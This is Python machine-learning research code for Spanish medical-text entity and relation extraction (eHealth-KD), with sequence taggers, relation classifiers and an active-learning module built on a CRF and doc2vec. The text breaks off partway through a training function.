assert set(TAXONOMIC_RELS + CONTEXT_RELS) == set(RELATIONS)
class eHealth20Model(Algorithm):
CHAR_EMBEDDING_DIM = 100
CHAR_REPR_DIM = 200
TOKEN_REPR_DIM = 300
POSITIONAL_EMBEDDING_DIM = 100
def __init__(
self,
taskA_models=None,
taskB_pair_model=None,
taskB_seq_model=None,
*,
only_representative=False,
bert_mode=None,
only_bert=False,
cnet_mode=None,
ignore_path=False,
):
if only_bert and bert_mode is None:
raise ValueError("BERT mode not set!")
nlp = get_nlp()
self.nlp = nlp if bert_mode is None else BertNLP(nlp, merge=bert_mode)
self.bert_mode = bert_mode
        self.taskA_models: Dict[str, nn.Module] = taskA_models
self.taskB_pair_model: nn.Module = taskB_pair_model
self.taskB_seq_model: nn.Module = taskB_seq_model
self.only_representative = only_representative
self.only_bert = only_bert
self.cnet_mode = cnet_mode
self.ignore_path = ignore_path
def run(self, collection: Collection, *args, taskA: bool, taskB: bool, **kargs):
print(f"Running {{ taskA:{taskA}, taskB:{taskB} }} at {kargs} ...")
if taskA:
if self.taskA_models is None:
warnings.warn("No model for taskA available. Skipping ...")
else:
print("Starting task A ...")
self.run_taskA(collection, *args, **kargs)
print("Done with task A!")
if taskB:
if self.taskB_pair_model is None and self.taskB_seq_model is None:
warnings.warn("No model for taskB available. Skipping ...")
else:
print("Starting task B ...")
self.run_taskB(collection, *args, **kargs)
print("Done with task B!")
return collection
def run_taskA(self, collection: Collection, *args, **kargs):
for label in ENTITIES:
self.run_taskA_for_label(collection, label, *args, **kargs)
collection.fix_ids()
def run_taskA_for_label(
self, collection: Collection, entity_label: str, *args, **kargs
):
model = self.taskA_models[entity_label]
print(f"Building dataset for {entity_label} ...")
dataset = BILUOVSentencesDS(
[s.text for s in collection.sentences], language=self.nlp
)
print(f"Done!")
with torch.no_grad():
for sid, (*s_features, _) in tqdm(
enumerate(dataset.shallow_dataloader()),
total=len(dataset),
desc=entity_label,
):
tokensxsentence = dataset.tokensxsentence[sid]
output = model(s_features)
output = model.decode(output)
labels = [dataset.labels[x] for x in output]
decoded = from_biluov(labels, tokensxsentence, spans=True)
sentence = collection.sentences[sid]
for spans in decoded:
keyphrase = Keyphrase(sentence, entity_label, -1, spans)
sentence.keyphrases.append(keyphrase)
def run_taskB(self, collection: Collection, *args, **kargs):
train_pairs, train_seq = (
(TAXONOMIC_RELS, CONTEXT_RELS)
if self.taskB_pair_model is not None and self.taskB_seq_model is not None
else (RELATIONS, None)
if self.taskB_pair_model is not None
else (None, RELATIONS)
if self.taskB_seq_model is not None
else (None, None)
)
mode, scenario = kargs["mode"], kargs["scenario"]
if mode == "train":
tag = "train"
elif mode == "dev":
tag = (
f"dev-{'transfer' if scenario.split('-')[-1] == 'transfer' else 'main'}"
)
elif mode == "test":
tag = f"test-{scenario.split('-')[-1]}"
else:
tag = None
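        # Resulting tags (assumption from the branches above): "train", "dev-main",
        # "dev-transfer", or "test-<scenario suffix>"; they only feed the ConceptNet
        # configuration handed to build_taskB_dataset below.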
print(f"Building dataset for {train_pairs} and {train_seq} ...")
pair_dataset, seq_dataset = self.build_taskB_dataset(
collection,
inclusion=1.1,
predict=True,
tag=tag,
train_pairs=train_pairs,
train_seqs=train_seq,
)
print("Done!")
self.run_taskB_on_pairs(pair_dataset, collection, *args, **kargs)
self.run_taskB_on_seqs(seq_dataset, collection, *args, **kargs)
def run_taskB_on_pairs(self, dataset, collection: Collection, *args, **kargs):
model = self.taskB_pair_model
if model is None:
return
with torch.no_grad():
for *features, (sid, s_id, d_id) in tqdm(
dataset.shallow_dataloader(),
total=len(dataset),
desc="Relations (Pairs)",
):
s_id = s_id.item()
d_id = d_id.item()
output = model(features).squeeze(0)
output = output.argmax(dim=-1)
label = dataset.labels[output.item()]
if label is None:
continue
sentence = collection.sentences[sid]
rel_origin = sentence.keyphrases[s_id].id
rel_destination = sentence.keyphrases[d_id].id
relation = Relation(sentence, rel_origin, rel_destination, label)
sentence.relations.append(relation)
def run_taskB_on_seqs(self, dataset, collection: Collection, *args, **kargs):
model = self.taskB_seq_model
if model is None:
return
with torch.no_grad():
for features, i, (sid, head_id, tokens_ids) in tqdm(
dataset.shallow_dataloader(),
total=len(dataset),
desc="Relations (Sequence)",
):
output = model((features, i))
output = model.decode(output)
labels = [dataset.labels[x] for x in output]
sentence = collection.sentences[sid]
head_entity = sentence.keyphrases[head_id]
for token_id, label in zip(tokens_ids, labels):
if label is None or token_id < 0:
continue
token_entity = sentence.keyphrases[token_id]
rel_origin = head_entity.id
rel_destination = token_entity.id
relation = Relation(sentence, rel_origin, rel_destination, label)
sentence.relations.append(relation)
def train(
self,
collection: Collection,
validation: Collection,
*,
jointly,
inclusion,
n_epochs=100,
save_to=None,
early_stopping=None,
use_crf=True,
weight=True,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
straight_forward_encoding=False,
reduce=False,
dropout=False,
stacked_layers=1,
):
self.train_taskA(
collection,
validation,
jointly,
n_epochs,
save_to=save_to,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
dropout=dropout,
stacked_layers=stacked_layers,
)
self.train_taskB(
collection,
validation,
jointly,
inclusion,
n_epochs,
save_to=save_to,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
)
def train_taskA(
self,
collection: Collection,
validation: Collection,
jointly,
n_epochs=100,
save_to=None,
early_stopping=None,
use_crf=True,
weight=True,
dropout=False,
stacked_layers=1,
):
if self.only_bert and jointly:
warnings.warn(
"Cannot train jointly while using only BERT model! `jointly` will be ignored"
)
jointly = False
char_encoder = None
models = {}
datasets = {}
validations = {}
for label in ENTITIES:
dataset = self.build_taskA_dataset(collection, label)
model = self.build_taskA_model(
dataset,
n_epochs,
shared=char_encoder,
use_crf=use_crf,
dropout=dropout,
stacked_layers=stacked_layers,
)
validation_ds = self.build_taskA_dataset(validation, label)
models[label] = model
datasets[label] = dataset
validations[label] = validation_ds
char_encoder = model.char_encoder if jointly else None
if jointly:
# dicts are stable
self.train_all_taskA_models(
models.values(),
datasets.values(),
validations.values(),
"all",
n_epochs,
save_to=(
[save_to(label) for label in ENTITIES]
if save_to is not None
else None
),
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
)
else:
for label in ENTITIES:
self.train_taskA_model(
models[label],
datasets[label],
validations[label],
label,
n_epochs,
save_to=save_to(label) if save_to is not None else None,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
)
self.taskA_models = models
def build_taskA_model(
self,
dataset: BILUOVSentencesDS,
n_epochs=100,
*,
shared=None,
use_crf=True,
dropout=False,
stacked_layers=1,
):
if self.only_bert:
model = BertBasedSequenceTagger(
word_repr_dim=dataset.vectors_len,
num_labels=dataset.label_size,
use_crf=use_crf,
)
else:
model = BasicSequenceTagger(
char_vocab_size=dataset.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset.vectors_len,
postag_repr_dim=dataset.pos_size,
token_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset.label_size,
char_encoder=shared,
use_crf=use_crf,
dropout=dropout,
stacked_layers=stacked_layers,
)
return model
def build_taskA_dataset(self, collection: Collection, entity_label: str):
sentences = [s.text for s in collection.sentences]
entities = [
[k.spans for k in s.keyphrases if k.label == entity_label]
for s in collection.sentences
]
dataset = BILUOVSentencesDS(sentences, entities, language=self.nlp)
return dataset
def train_taskA_model(
self,
model,
dataset,
validation,
desc,
n_epochs=100,
save_to: str = None,
early_stopping=None,
use_crf=True,
weight=True,
):
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in taskA model. `weight` will be ignored."
)
criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=dataset.weights())
if weight
else None
)
validation_criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=validation.weights())
if weight
else None
)
train_on_shallow_dataloader(
model,
dataset,
validation,
optim=optim.SGD,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=model.decode if use_crf else None,
n_epochs=n_epochs,
desc=desc,
save_to=save_to,
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode),
)
def train_all_taskA_models(
self,
models,
datasets,
validations,
desc,
n_epochs=100,
save_to: str = None,
early_stopping=None,
use_crf=True,
weight=True,
):
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in taskA model. `weight` will be ignored."
)
if use_crf:
criterion = lambda i, model: model.crf_loss
validation_criterion = None
elif weight:
_criterion = [
nn.CrossEntropyLoss(weight=dataset.weights()) for dataset in datasets
]
criterion = lambda i, model: _criterion[i]
_validation_criterion = [
nn.CrossEntropyLoss(weight=validation.weights())
for validation in validations
]
validation_criterion = lambda i, model: _validation_criterion[i]
else:
criterion, validation_criterion = None, None
jointly_train_on_shallow_dataloader(
models,
datasets,
validations,
optim=optim.SGD,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=(lambda i, model: model.decode) if use_crf else None,
n_epochs=n_epochs,
desc=desc,
save_to=save_to,
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode),
)
def train_taskB(
self,
collection: Collection,
validation: Collection,
jointly,
inclusion,
n_epochs=100,
save_to=None,
early_stopping=None,
weight=True,
use_crf=True,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
straight_forward_encoding=False,
reduce=False,
dropout=False,
):
if weight and inclusion <= 1:
warnings.warn(
"Since using `weight=True`, you probably meant to set `inclusion=1.1`."
)
if self.only_bert and jointly:
warnings.warn(
"Cannot train jointly while using only BERT model! `jointly` will be ignored"
)
jointly = False
print(f"Training pairs: {train_pairs}")
print(f"Training seqs: {train_seqs}")
dataset1, dataset2 = self.build_taskB_dataset(
collection,
inclusion,
tag="train",
train_pairs=train_pairs,
train_seqs=train_seqs,
)
validation_ds1, validation_ds2 = self.build_taskB_dataset(
validation,
inclusion=1.1,
tag="dev-main",
train_pairs=train_pairs,
train_seqs=train_seqs,
)
char2repr = (
next(iter(self.taskA_models.values())).char_encoder if jointly else None
)
if dataset1 is not None:
if self.only_bert:
model = BertBasedSequenceClassifier(
word_repr_dim=dataset1.vectors_len,
num_labels=dataset1.label_size,
merge_mode=self.bert_mode,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
elif self.ignore_path:
model = PairClassifier(
char_vocab_size=dataset1.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset1.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset1.vectors_len,
postag_repr_dim=dataset1.pos_size,
entity_repr_dim=dataset1.ent_size,
subtree_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset1.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
else:
model = BasicSequenceClassifier(
char_vocab_size=dataset1.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset1.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset1.vectors_len,
postag_repr_dim=dataset1.pos_size,
dep_repr_dim=dataset1.dep_size,
entity_repr_dim=dataset1.ent_size,
subtree_repr_dim=self.TOKEN_REPR_DIM,
token_repr_dim=self.TOKEN_REPR_DIM,
num_labels=dataset1.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
pairwise_info_size=dataset1.pair_size,
reduce=reduce,
)
criterion = (
nn.CrossEntropyLoss(weight=dataset1.weights()) if weight else None
)
validation_criterion = (
nn.CrossEntropyLoss(weight=validation_ds1.weights()) if weight else None
)
train_on_shallow_dataloader(
model,
dataset1,
validation_ds1,
criterion=criterion,
validation_criterion=validation_criterion,
n_epochs=n_epochs,
desc="relations (pairs)",
save_to=save_to("taskB-pairs"),
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode, cnet=self.cnet_mode),
)
self.taskB_pair_model = model
if dataset2 is not None:
## THIS IS NOT CONVENIENT
# char2repr = (
# self.taskB_pair_model.char_encoder
# if jointly and char2repr is None and self.taskB_pair_model is not None
# else char2repr
# )
model = AttentionSequenceTagger(
char_vocab_size=dataset2.char_size,
char_embedding_dim=self.CHAR_EMBEDDING_DIM,
padding_idx=dataset2.padding,
char_repr_dim=self.CHAR_REPR_DIM,
word_repr_dim=dataset2.vectors_len,
postag_repr_dim=dataset2.pos_size,
dep_repr_dim=dataset2.dep_size,
rdep_repr_dim=dataset2.rdep_size,
entity_repr_dim=dataset2.ent_size,
token_repr_dim=self.TOKEN_REPR_DIM,
position_repr_dim=dataset2.positional_size,
num_labels=dataset2.label_size,
char_encoder=char2repr,
already_encoded=False,
freeze=True,
use_crf=use_crf,
pairwise_repr_dim=dataset2.pair_size,
straight_forward_encoding=straight_forward_encoding,
)
if use_crf and weight:
warnings.warn(
"Using both CRF and weighting in sequence relation model. `weight` will be ignored."
)
criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=dataset2.weights())
if weight
else None
)
validation_criterion = (
model.crf_loss
if use_crf
else nn.CrossEntropyLoss(weight=validation_ds2.weights())
if weight
else None
)
predictor = model.decode if use_crf else None
train_on_shallow_dataloader(
model,
dataset2,
validation_ds2,
criterion=criterion,
validation_criterion=validation_criterion,
predictor=predictor,
n_epochs=n_epochs,
desc="relations (sequence)",
save_to=save_to("taskB-seqs"),
early_stopping=early_stopping,
extra_config=dict(bert=self.bert_mode, cnet=self.cnet_mode),
)
self.taskB_seq_model = model
def build_taskB_dataset(
self,
collection: Collection,
inclusion,
predict=False,
tag=None,
train_pairs=TAXONOMIC_RELS,
train_seqs=CONTEXT_RELS,
):
if train_pairs is None and train_seqs is None:
return None, None
tokensxsentence = [self.nlp(s.text) for s in collection.sentences]
entities = [
[(k.spans, k.label) for k in s.keyphrases] for s in collection.sentences
]
entitiesxsentence, token2label = match_tokens_to_entities(
tokensxsentence, entities, only_representative=self.only_representative
)
keyphrase2tokens = {
keyphrase: token
for sentence, tokens in zip(collection.sentences, entitiesxsentence)
for keyphrase, token in zip(sentence.keyphrases, tokens)
}
def get_relations(labels):
return (
{
(
keyphrase2tokens[rel.from_phrase],
keyphrase2tokens[rel.to_phrase],
): rel.label
for sentence in collection.sentences
for rel in sentence.relations
if rel.label in labels
}
if not predict
else None
)
pair_dataset = (
DependencyTreeDS(
entitiesxsentence,
get_relations(set(train_pairs)),
token2label,
ENTITIES,
train_pairs,
self.nlp,
inclusion=inclusion,
char2repr=None,
conceptnet=(
self.cnet_mode
if tag is None
else {"mode": self.cnet_mode, "tag": tag}
),
ignore_deps=self.ignore_path or self.only_bert,
)
if train_pairs is not None
else None
)
seq_dataset = (
FocusOnEntityDS(
tokensxsentence,
entitiesxsentence,
get_relations(set(train_seqs)),
token2label,
ENTITIES,
train_seqs,
self.nlp,
self.POSITIONAL_EMBEDDING_DIM,
char2repr=None,
conceptnet=(
self.cnet_mode
if tag is None
else {"mode": self.cnet_mode, "tag": tag}
),
)
if train_seqs is not None
else None
)
return pair_dataset, seq_dataset
def save_models(self, path="./trained/"):
for label, model in self.taskA_models.items():
torch.save(model, os.path.join(path, f"taskA-{label}.pt"))
torch.save(self.taskB_pair_model, os.path.join(path, "taskB.pt"))
torch.save(self.taskB_seq_model, os.path.join(path, "taskB-seqs.pt"))
if __name__ == "__main__":
from pathlib import Path
def name_to_path(name):
if name in ENTITIES:
return f"trained/taskA-{name}.pt"
if name == "taskB-pairs":
return "trained/taskB.pt"
if name == "taskB-seqs":
return "trained/taskB-seqs.pt"
raise ValueError("Cannot handle `name`")
def _training_task(
n_epochs,
*,
bert_mode,
cnet_mode,
ignore_path,
inclusion=1.1,
task=None,
jointly=True,
early_stopping=None,
use_crf=True,
weight=True,
only_bert=False,
reduce=False,
split_relations="both",
straight_forward_encoding=False,
dropout=False,
stacked_layers=1,
):
if split_relations not in ("both", "pair", "seq"):
raise ValueError()
training = Collection().load(Path("data/training/scenario.txt"))
validation = Collection().load(Path("data/development/main/scenario.txt"))
early_stopping = early_stopping or dict(wait=5, delta=0.0)
train_pairs = (
TAXONOMIC_RELS
if split_relations == "both"
else RELATIONS
if split_relations == "pair"
else None
)
train_seqs = (
CONTEXT_RELS
if split_relations == "both"
else RELATIONS
if split_relations == "seq"
else None
)
algorithm = eHealth20Model(
bert_mode=bert_mode,
only_bert=only_bert,
cnet_mode=cnet_mode,
ignore_path=ignore_path,
)
if task is None:
algorithm.train(
training,
validation,
jointly=jointly,
inclusion=inclusion,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
stacked_layers=stacked_layers,
)
elif task == "A":
algorithm.train_taskA(
training,
validation,
jointly=jointly,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
use_crf=use_crf,
weight=weight,
dropout=dropout,
stacked_layers=stacked_layers,
)
elif task == "B":
# load A
if jointly:
taskA_models = {}
for label in ENTITIES:
checkpoint = torch.load(f"trained/taskA-{label}.pt")
_ensure_bert(bert_mode, checkpoint)
model = checkpoint["model"]
taskA_models[label] = model
model.eval()
algorithm.taskA_models = taskA_models
algorithm.train_taskB(
training,
validation,
jointly=jointly,
inclusion=inclusion,
n_epochs=n_epochs,
save_to=name_to_path,
early_stopping=early_stopping,
weight=weight,
use_crf=use_crf,
train_pairs=train_pairs,
train_seqs=train_seqs,
straight_forward_encoding=straight_forward_encoding,
reduce=reduce,
dropout=dropout,
)
def _log_checkpoint(checkpoint, *, desc):
print(f"[{desc}]:".center(80, ":"))
for key, value in checkpoint.items():
print(f"{key}: {value}")
def _ensure_bert(bert_mode, checkpoint):
try:
bert = checkpoint["bert"]
if bert_mode != bert:
raise ValueError(
"The model was not trained using the same configuration of BERT."
)
except KeyError:
if bert_mode is not None:
raise ValueError("The model was not trained using BERT.")
def _ensure_conceptnet(cnet_mode, checkpoint):
try:
conceptnet = checkpoint["cnet"]
if cnet_mode != conceptnet:
raise ValueError(
"The model was not trained using the same configuration for ConceptNet."
)
except KeyError:
if cnet_mode is not None:
raise ValueError("The model was not trained using ConceptNet.")
def _run_task(
run_name="ehealth20-default",
*,
bert_mode,
cnet_mode,
ignore_path,
task=None,
only_bert=False,
):
if task == "B":
taskA_models = None
else:
taskA_models = {}
for label in ENTITIES:
checkpoint = torch.load(f"trained/taskA-{label}.pt")
_log_checkpoint(checkpoint, desc=label)
_ensure_bert(bert_mode, checkpoint)
model = checkpoint["model"]
taskA_models[label] = model
model.eval()
if task == "A":
taskB_pair_model = None
taskB_seq_model = None
else:
try:
checkpoint = torch.load("./trained/taskB.pt")
_log_checkpoint(checkpoint, desc="Relations (Pairs)")
_ensure_bert(bert_mode, checkpoint)
_ensure_conceptnet(cnet_mode, checkpoint)
taskB_pair_model = checkpoint["model"]
if taskB_pair_model is not None:
taskB_pair_model.eval()
except FileNotFoundError:
taskB_pair_model = None
try:
checkpoint = torch.load("./trained/taskB-seqs.pt")
_log_checkpoint(checkpoint, desc="Relations (Sequence)")
_ensure_bert(bert_mode, checkpoint)
_ensure_conceptnet(cnet_mode, checkpoint)
taskB_seq_model = checkpoint["model"]
if taskB_seq_model is not None:
taskB_seq_model.eval()
except FileNotFoundError:
taskB_seq_model = None
algorithm = eHealth20Model(
taskA_models,
taskB_pair_model,
taskB_seq_model,
bert_mode=bert_mode,
only_bert=only_bert,
cnet_mode=cnet_mode,
ignore_path=ignore_path,
)
tasks = handle_args()
Run.submit(run_name, tasks, algorithm)
def _test_biluov_task():
import es_core_news_md
from scripts.utils import Sentence
def forward(tokensxsentence, entitiesxsentence):
labelsxsentence, _ = to_biluov(tokensxsentence, entitiesxsentence)
return [
from_biluov(biluov, sentence, spans=True)
for biluov, sentence in zip(labelsxsentence, tokensxsentence)
]
training = Collection().load(Path("data/training/scenario.txt"))
nlp = es_core_news_md.load()
def per_label(label):
tokensxsentence = [nlp(s.text) for s in training.sentences]
entitiesxsentence = [
[k.spans for k in s.keyphrases if k.label == label]
for s in training.sentences
]
decoded = forward(tokensxsentence, entitiesxsentence)
return decoded
collection = Collection([Sentence(s.text) for s in training.sentences])
for label in ENTITIES:
decoded = per_label(label)
for entities, sentence in zip(decoded, collection.sentences):
for spans in entities:
keyphrase = Keyphrase(sentence, label, -1, spans)
sentence.keyphrases.append(keyphrase)
collection.fix_ids()
output = Path("data/submissions/forward-biluov/train/run1/scenario2-taskA/")
output.mkdir(parents=True, exist_ok=True)
collection.dump(output / "scenario.txt", skip_empty_sentences=False)
``` |
{
"source": "jpconsuegra/ensemble-baseline",
"score": 2
} |
#### File: ensemble-baseline/autobrat/classifier.py
```python
from pathlib import Path
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from threading import Thread, Lock
import random
import scipy
import logging
import fire
import uuid
import shutil
import os
import tqdm
import spacy
import numpy as np
import pickle
from sklearn_crfsuite import CRF
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
from scripts.utils import Collection, Keyphrase, Relation, Sentence
from autobrat.data import (
load_training_entities,
load_corpus,
save_corpus,
make_sentence,
load_training_relations,
_extract_keyphrases_features,
spacy_model,
)
logger = logging.getLogger("autobrat.classifier")
class Model:
def __init__(
self,
corpus: Collection,
callback=None,
language: str = "es",
negative_sampling: float = 0.25,
suggest_mode: str = "full",
max_entity_uncertainty: float = 1e50,
max_relation_uncertainty: float = 1e50,
):
self.corpus = corpus
self.lock = Lock()
self.callback = callback
self.language = language
self.entity_classifier = ClassifierEntity(
callback, negative_sampling=negative_sampling
)
self.suggest_mode = suggest_mode
self.max_entity_uncertainty = max_entity_uncertainty
self.max_relation_uncertainty = max_relation_uncertainty
def train(self):
self.train_similarity()
self.train_entities()
self.train_relations()
if self.lock.locked():
self.lock.release()
logger.info("Training finished")
def train_similarity(self):
nlp = spacy_model(self.language)
docs = []
for i, sentence in enumerate(self.corpus):
doc = nlp(sentence.text)
docs.append(TaggedDocument([token.text for token in doc], [i]))
self.doc2vec = Doc2Vec(docs, min_count=1, epochs=100, vector_size=25)
self.entity_classifier.doc2vec = self.doc2vec
def train_entities(self):
# vectorizer
logger.info("Loading entities training set")
lines, classes = load_training_entities(self.corpus)
self.entity_classifier.train_entities(lines, classes)
def train_relations(self):
"""Entrena el clasificador de relaciones con un par de palabras y
la relación correspondiente entre ellas, incluyendo la relación NONE.
"""
logger.info("Loading relations training set")
self.entity_classifier.train_relations(self.corpus)
def train_async(self):
if self.lock.locked():
logger.warning("Training in process, skipping this batch.")
return False
thread = Thread(target=self.train)
thread.start()
return True
def relevant_sentence(self, sentence, relevant_words):
relevant = 0
for i in sentence:
relevant += relevant_words[i.text]
return relevant / len(sentence)
def predict_entities(self, sentences):
"""Predice para cada palabra su etiqueta
"""
collection = self.entity_classifier.predict_entities(sentences)
for sentence in collection:
sentence.keyphrases = [
k
for k in sentence.keyphrases
if k.uncertainty < self.max_entity_uncertainty
]
return collection
def predict_relations(self, collection):
"""Predice para cada oración todas las relaciones
"""
collection = self.entity_classifier.predict_relations(collection)
for sentence in collection:
sentence.relations = [
r
for r in sentence.relations
if r.uncertainty < self.max_relation_uncertainty
]
return collection
def predict(self, sentences):
return self.predict_relations(self.predict_entities(sentences))
def score_sentence(self, sentence, return_dict=False):
if self.suggest_mode == "entity":
return self.entity_classifier.score_entities(sentence)
if self.suggest_mode == "relation":
return self.entity_classifier.score_relations(sentence)
score_entity = self.entity_classifier.score_entities(sentence)
score_relation = self.entity_classifier.score_relations(sentence)
score_similarity = self.entity_classifier.score_similarity(sentence)
if return_dict:
return dict(
score_entity=score_entity,
score_relations=score_relation,
score_similarity=score_similarity,
)
return 0.5 * (score_entity + score_relation) * score_similarity
def suggest(self, pool, count=5):
"""Devuelve las k oraciones más relevantes
"""
scores = {s: self.score_sentence(s) for s in pool}
scores = sorted(scores, key=scores.get)
return scores[-count:]
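# Hedged active-learning sketch (building the `corpus` Collection and the pool of raw
# sentence strings is repo-specific and omitted here):
#   model = Model(corpus, suggest_mode="full")
#   model.train()
#   batch = model.suggest(pool_sentences, count=5)   # highest-scoring, most informative sentences
#   predicted = model.predict(batch)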
class ClassifierEntity:
"""
Representa un clasificador de entidades, independiente del corpus.
Puede ser entrenado con una lista de entidades en formato BILOUV
y usado para predecir en una lista de oraciones vacías.
"""
def __init__(self, callback=None, negative_sampling=0.25):
self.callback = callback
self.doc2vec = None
self.negative_sampling = negative_sampling
self.n_similarity_estimates = 10
def predict_entities(self, sentences):
if isinstance(sentences[0], Sentence):
sentences = [s.text for s in sentences]
result = []
nlp = spacy_model("es")
for i, sentence in enumerate(sentences):
if self.callback:
self.callback(
msg="Processing sentence", current=i, total=len(sentences)
)
doc, xs = self.feature_sentence(sentence)
sentence = self.predict_single(doc, xs)
result.append(sentence)
return Collection(sentences=result)
def predict_single(self, doc, sequence_of_features):
labels = self.classifier.predict_single(sequence_of_features)
sentence = make_sentence(doc, labels, self.classes)
sentence.fix_ids()
ys = self.classifier.predict_marginals_single(sequence_of_features)
entropies = [scipy.stats.entropy(list(yi.values()), base=2) for yi in ys]
for keyphrase in sentence.keyphrases:
start = keyphrase.spans[0][0]
end = keyphrase.spans[-1][1]
keyphrase_tokens = [
i
for i, token in enumerate(doc)
if token.idx >= start and token.idx + len(token) <= end
]
keyphrase_entropies = [entropies[i] for i in keyphrase_tokens]
keyphrase.uncertainty = sum(keyphrase_entropies) / len(keyphrase_entropies)
return sentence
def score_entities(self, sentence):
doc, xs = self.feature_sentence(sentence)
keyphrases = self.predict_single(doc, xs).keyphrases
entropies = [k.uncertainty for k in keyphrases]
mean_entropy = sum(entropies) / len(entropies) if entropies else 0
return mean_entropy
def score_relations(self, sentence):
doc, xs = self.feature_sentence(sentence)
sentence = self.predict_single(doc, xs)
self.predict_relation_single(doc, sentence)
entropies = [r.uncertainty for r in sentence.relations]
mean_entropy = sum(entropies) / len(entropies) if entropies else 0
return mean_entropy
def score_similarity(self, sentence):
tokens = [token.text for token in spacy_model("es")(sentence)]
inferred_vector = self.doc2vec.infer_vector(tokens)
sims = [
v
for i, v in self.doc2vec.docvecs.most_similar(
[inferred_vector], topn=self.n_similarity_estimates
)
]
return np.mean(sims)
def feature_sentence(self, sentence):
nlp = spacy_model("es")
if isinstance(sentence, str):
doc = nlp(sentence)
else:
doc = sentence
xs = []
for token in doc:
xs.append(self.word_features(token))
return doc, xs
def word_features(self, word):
features = dict(
text=word.text,
pos=word.pos_,
dep=word.dep_,
lemma=word.lemma_,
entity=word.ent_type_,
entity_iob=word.ent_iob_,
kb_id=word.ent_kb_id,
shape=word.shape_,
is_alpha=word.is_alpha,
is_ascii=word.is_ascii,
is_digit=word.is_digit,
is_lower=word.is_lower,
is_upper=word.is_upper,
is_title=word.is_title,
is_punct=word.is_punct,
is_stop=word.is_stop,
is_left_punct=word.is_left_punct,
is_right_punct=word.is_right_punct,
like_url=word.like_url,
like_num=word.like_num,
like_email=word.like_email,
)
tags = word.tag_
try:
_, tags = tags.split("__")
for tag in tags.split("|"):
k, v = tag.split("=")
features[k] = v
except:
pass
return features
def train_entities(self, sentences, classes):
logger.info("Preparing training set")
X_training_set = []
y_training_set = classes
for i, sentence in enumerate(sentences):
doc, xs = self.feature_sentence(sentence)
X_training_set.append(xs)
if self.callback:
self.callback(
msg="Processing sentence", current=i, total=len(sentences)
)
logger.info(f"Training in {len(X_training_set)} examples")
# Train classifier
classifier = CRF()
classifier.fit(X_training_set, y_training_set)
self.classes = set(sum(y_training_set, []))
self.classifier = classifier
def predict_relation_single(self, doc, sentence):
        # predict the most likely relation for each pair of words
for k1 in sentence.keyphrases:
for k2 in sentence.keyphrases:
if k1 == k2:
continue
                # k1 and k2 are Keyphrases; convert them to features
features = self.relation_features(None, k1, k2, doc)
if features is None:
continue
relation_label = self.relation_classifier.predict([features])[0]
if not relation_label:
continue
relation = Relation(sentence, k1.id, k2.id, relation_label)
probs = self.relation_classifier.predict_proba([features])[0]
relation.uncertainty = scipy.stats.entropy(list(probs), base=2)
sentence.relations.append(relation)
def predict_relations(self, collection: Collection):
nlp = spacy_model("es")
for sentence in collection.sentences:
doc = nlp(sentence.text)
self.predict_relation_single(doc, sentence)
return collection
def relation_features(
self,
relation: Relation = None,
keyphrase_from: Keyphrase = None,
keyphrase_to: Keyphrase = None,
doc=None,
):
if relation is not None:
keyphrase_from = relation.from_phrase
keyphrase_to = relation.to_phrase
if doc is None:
doc = spacy_model("es")(keyphrase_from.sentence.text)
doc_from = [
token
for token in doc
if token.idx >= keyphrase_from.spans[0][0]
and token.idx <= keyphrase_from.spans[-1][0]
]
doc_to = [
token
for token in doc
if token.idx >= keyphrase_to.spans[0][0]
and token.idx <= keyphrase_to.spans[-1][0]
]
if not doc_from or not doc_to:
return None
from_features = {
"from_%s" % k: v for k, v in self.word_features(doc_from[0]).items()
}
to_features = {"to_%s" % k: v for k, v in self.word_features(doc_to[0]).items()}
lcp = doc_from[0]
while not lcp.is_ancestor(doc_to[0]):
lcp = lcp.head
if lcp == lcp.head:
break
inner_text = [
token.lemma_ for token in lcp.subtree if token not in doc_to + doc_from
]
d = dict(
from_features,
**to_features,
from_type=keyphrase_from.label,
to_type=keyphrase_to.label,
)
for w in inner_text:
d[f"inner({w})"] = True
return d
def train_relations(self, collection: Collection):
X_training = []
y_training = []
nlp = spacy_model("es")
for i, sentence in enumerate(collection.sentences):
doc = nlp(sentence.text)
for relation in sentence.relations:
